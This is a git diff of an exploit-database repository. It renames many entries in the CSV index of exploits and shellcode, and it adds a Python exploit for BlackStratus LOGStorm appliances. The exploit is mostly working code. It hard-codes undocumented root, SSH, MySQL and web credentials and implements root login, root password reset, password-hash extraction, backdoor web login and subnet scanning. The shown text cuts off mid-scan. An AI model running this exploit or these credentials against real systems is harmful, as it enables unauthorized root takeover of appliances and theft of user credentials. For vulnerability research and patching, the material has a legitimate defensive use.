+40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)",2016-07-26,xort,linux,remote,8000
 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hard-Coded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23
 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
-40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
+40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
-40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000
+40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000
 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80
 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
@@ -15117,6 +15120,8 @@ id,file,description,date,author,platform,type,port
 40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
 40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
+40858,platforms/hardware/remote/40858.py,"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution",2016-12-04,"Jeremy Brown",hardware,remote,0
+40862,platforms/windows/remote/40862.py,"Alcatel Lucent Omnivista 8770 - Remote Code Execution",2016-12-04,malerisch,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15564,7 +15569,7 @@ id,file,description,date,author,platform,type,port
 21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
-40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
@@ -15674,7 +15679,7 @@ id,file,description,date,author,platform,type,port
 39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
-40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP Port 1472 (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
@@ -15702,13 +15707,13 @@ id,file,description,date,author,platform,type,port
 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - TCP Reverse Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
-40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
+40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
 40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
-40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
+40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
-40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
+40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
-40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
+40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@@ -26560,7 +26565,7 @@ id,file,description,date,author,platform,type,port
 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php' mos_change_template Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0
 23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Arbitrary JavaScript Execution (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0
 23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - SQL Injection (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0
-23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit",2013-01-02,xistence,php,webapps,0
+23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution",2013-01-02,xistence,php,webapps,0
 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 - 'index.php' SQL Injection",2004-03-16,JeiAr,php,webapps,0
 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0
 23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps,0
@@ -26748,7 +26753,7 @@ id,file,description,date,author,platform,type,port
 24201,platforms/php/webapps/24201.txt,"PHP-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0
 24202,platforms/hardware/webapps/24202.txt,"Linksys WRT54GL (Firmware 4.30.15 build 2) - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0
 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
-24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
+24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Inclusion",2004-06-15,loofus,php,webapps,0
 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0
 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0
@@ -30847,7 +30852,7 @@ id,file,description,date,author,platform,type,port
 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
-30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell",2013-12-06,0_o,hardware,webapps,0
+30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0
 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0
 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0
 30065,platforms/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0
@@ -31190,7 +31195,7 @@ id,file,description,date,author,platform,type,port
 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
 31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injection",2008-01-15,Xcross87,php,webapps,0
 31029,platforms/php/webapps/31029.pl,"WordPress Plugin Peter's Math Anti-Spam 0.1.6 - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0
-30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
+30691,platforms/php/webapps/30691.txt,"Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0
 30694,platforms/php/webapps/30694.txt,"Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0
 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 - rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0
@@ -33541,7 +33546,7 @@ id,file,description,date,author,platform,type,port
 34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - lyrics.php id Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0
 34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - adult/video_listing.php key Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0
 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Inclusion",2014-09-15,Vulnerability-Lab,ios,webapps,0
-34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80
+34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Code Execution",2014-09-15,eF,php,webapps,80
 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090
 34673,platforms/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps,0
 34674,platforms/php/webapps/34674.txt,"WebStatCaffe - stat/mostvisitpage.php nodayshow Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0
@@ -36265,7 +36270,7 @@ id,file,description,date,author,platform,type,port
 39213,platforms/php/webapps/39213.txt,"WordPress Plugin Featured Comments - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0
 39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0
 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
-39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80
+39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Command Execution",2016-01-14,@iamsecurity,php,webapps,80
 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090
 39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0
 39237,platforms/php/webapps/39237.txt,"WordPress Plugin NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0
@@ -36643,7 +36648,7 @@ id,file,description,date,author,platform,type,port
 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
-40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
+40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
 40168,platforms/php/webapps/40168.txt,"Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-27,"Vinesh Redkar",php,webapps,80
 40174,platforms/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80
 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443
@@ -36656,7 +36661,7 @@ id,file,description,date,author,platform,type,port
 40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
 40206,platforms/php/webapps/40206.txt,"WordPress Plugin Count Per Day 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
 40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80
-40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80
+40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Code Execution",2016-08-06,LiquidWorm,php,webapps,80
 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)",2016-08-06,LiquidWorm,php,webapps,80
 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
@@ -36669,7 +36674,7 @@ id,file,description,date,author,platform,type,port
 40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80
 40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
-40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
+40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Code Execution",2016-08-10,LiquidWorm,php,webapps,80
 40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0
 40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80
 40281,platforms/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
@@ -36785,7 +36790,7 @@ id,file,description,date,author,platform,type,port
 40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
 40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting",2016-10-28,LiquidWorm,php,webapps,0
 40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
-40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
+40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
 40637,platforms/php/webapps/40637.txt,"Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80
 40650,platforms/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,php,webapps,0
 40671,platforms/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,php,webapps,0

platforms/hardware/remote/26412.pl

@@ -87,7 +87,7 @@ while(1){
      $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
      $data=get($bug) || die "[-] Error: $ARGV[0] $!\n";
      $data =~ s/Null/File not found!/gs;
-     if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
+     if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
      print $1."\n";
      }
    }

platforms/hardware/remote/40858.py

@@ -0,0 +1,225 @@
+#!/usr/bin/python
+# logstorm-root.py
+#
+# BlackStratus LOGStorm Remote Root Exploit
+#
+# Jeremy Brown [jbrown3264/gmail]
+# Dec 2016
+#
+# -Synopsis-
+#
+# "Better Security and Compliance for Any Size Business"
+#
+# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among
+# other things, to assume complete control over the virtual appliance with root privileges. This is
+# possible due to multiple network servers listening for network connections by default, allowing
+# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.
+#
+# -Tested-
+#
+# v4.5.1.35
+# v4.5.1.96
+#
+# -Usage-
+#
+# Dependencies: pip install paramiko MySQL-python
+#
+# There are (5) actions provided in this script: root, reset, sql, web and scan.
+#
+# [root]  utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command
+# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password
+# [sql*]  utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials
+# [web]   utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account
+# [scan]  scans a given <host>/24 for potentially vulnerable appliances
+#
+# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.
+#
+# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.
+#
+# -Fixes-
+#
+# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But
+# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall
+# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another
+# product altogether because this appliance, as of today, simply adds too much attack surface to the network.
+#
+# -Bonuses-
+#
+# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks
+# 
+# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files
+# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running
+# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)
+#
+# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd
+#
+
+import sys
+import socket
+import time
+from paramiko import ssh_exception
+import paramiko
+import MySQLdb
+import httplib
+import urllib
+
+SSH_BANNER = "_/_/_/_/"
+SSH_PORT = 22
+MYSQL_PORT = 3306
+MYSQL_DB = "htr"
+MYSQL_CMD = "select USER_ID,hex(MD5_PASSWORD) from users;"
+WEB_URL = "/tvs/layout/j_security_check"
+
+ROOT_CREDS =   ["root", "3!acK5tratu5"]
+HTINIT_CREDS = ["htinit", "htinit"]
+MYSQL_CREDS =  ["htr", "htr_pwd"]
+WEB_CREDS =    ["webserviceuser", "donotChangeOnInstall"]
+
+
+def main():
+    if(len(sys.argv) < 2):
+        print("Usage: %s <action> <host>" % sys.argv[0])
+        print("Eg.    %s root 10.1.1.3\n" % sys.argv[0])
+        print("Actions: root reset sql web scan")
+        return
+ 
+    action = str(sys.argv[1])
+    host = str(sys.argv[2])
+
+    if("scan" not in action):
+        try:
+            socket.inet_aton(host)
+        except socket.error:
+            print("[-] %s doesn't look like a valid ip address" % host)
+            return
+
+    ssh = paramiko.SSHClient()
+    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+    #
+    # ssh login as root and execute 'id'
+    #
+    if(action == "root"):
+        try:
+            ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)
+        except ssh_exception.AuthenticationException:
+            print("\n[-] Action failed, could not login with root credentials\n")
+            return
+
+        print("[+] Success!")
+        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("id")
+        print(ssh_stdout.readline())
+
+        return
+
+    #
+    # ssh login as htinit and reset root password to the default
+    #
+    elif(action == "reset"):
+        print("[~] Resetting password on %s..." % host)
+
+        try:
+            ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)
+        except ssh_exception.AuthenticationException:
+            print("\n[-] Reset failed, could not login with htinit credentials\n")
+            return
+
+        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("")
+
+        ssh_stdin.write("4" + "\n")
+        time.sleep(2)
+        ssh_stdin.write(ROOT_CREDS[1] + "\n")
+        time.sleep(2)
+        ssh_stdin.write("^C" + "\n")
+        time.sleep(1)
+
+        print("[+] Appliance root password should now be reset")
+
+        return
+
+    #
+    # sql login as htr and select user/hash columns from the web users table
+    #
+    elif(action == "sql"):
+        print("[~] Asking %s for it's web users and their password hashes..." % host)
+
+        try:
+            db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)
+        except MySQLdb.Error as error:
+            print("\n[-] Failed to connect to %s:\n%s\n" % (host, error))
+            return
+
+        cursor = db.cursor()
+        cursor.execute(MYSQL_CMD)
+
+        data = cursor.fetchall()
+
+        print("[+] Got creds!\n")
+
+        for row in data:
+            print("USER_ID: %s\nMD5_PASSWORD: %s\n" % (row[0], row[1]))
+
+        db.close()
+
+        return
+
+    #
+    # http login as webserviceuser and gain presumably admin privileges
+    #
+    elif(action == "web"):
+        print("[~] Attempting to login as backdoor web user at %s..." % host)
+
+        try:   
+            client = httplib.HTTPSConnection(host)
+        except:
+            print("[-] Couldn't establish SSL connection to %s" % host)
+            return
+
+        params = urllib.urlencode({"j_username" : WEB_CREDS[0], "j_password" : WEB_CREDS[1]})
+        headers = {"Host" : host, "Content-Type" : "application/x-www-form-urlencoded", "Content-Length" : "57"}
+
+        client.request("POST", WEB_URL, params, headers)
+
+        response = client.getresponse()
+
+        if(response.status == 408):
+            print("[+] Success!")
+        else:
+            print("[-] Service returned %d %s, which is actually not our criteria for success" % (response.status, response.reason))
+
+        return
+
+    #
+    # check the ssh network banner to identify appliances within range of <host>/24
+    #
+    elif(action == "scan"):
+        count = 0
+        print("[~] Scanning %s for LOGStorm appliances..." % sys.argv[2])
+
+        for x in range(1,255):
+            banner = None
+
+            #
+            # 10.1.1.1/24 -> 10.1.1.[x]
+            #
+            host = str(sys.argv[2]).split('/')[0][:-1] + str(x)
+
+            try:
+                ssh.connect(host, SSH_PORT, "user-that-doesnt-exist", "pass-that-doesnt-work", timeout=2)
+            except ssh_exception.NoValidConnectionsError:
+                pass
+            except socket.timeout:
+                pass
+            except ssh_exception.AuthenticationException as error:
+                banner = ssh._transport.get_banner()
+                if banner and SSH_BANNER in banner:
+                    print("[!] %s\n" % host)
+                    count+=1
+
